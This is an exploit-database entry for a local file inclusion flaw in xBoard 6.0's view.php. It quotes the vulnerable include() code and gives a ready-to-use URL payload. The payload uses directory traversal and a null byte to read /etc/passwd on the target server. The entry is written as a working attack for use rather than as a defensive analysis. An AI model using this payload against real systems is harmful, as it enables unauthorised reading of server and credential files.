##########################################
# Exploit Title: xBoard 6.0 Local File Inclusion
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database
# Software Link: http://sourceforge.net/projects/xboard/
# Category: webapps/php
# Version: 6.0
# Google dork: N/A
# Tested on: Apache(CentOS) PHP/5.2.17
##########################################
Vulnerable code: view.php
27. if (file_exists("$directory/$post.html"))
28. {
29. include("$directory/$post.html");
Exploit
/view.php?post={localfile}{nullbyte}
http://{host}/xboard/view.php?post=../../../../../../../../../../etc/passwd%00
PoC>>http://oi45.tinypic.com/1z6h729.jpg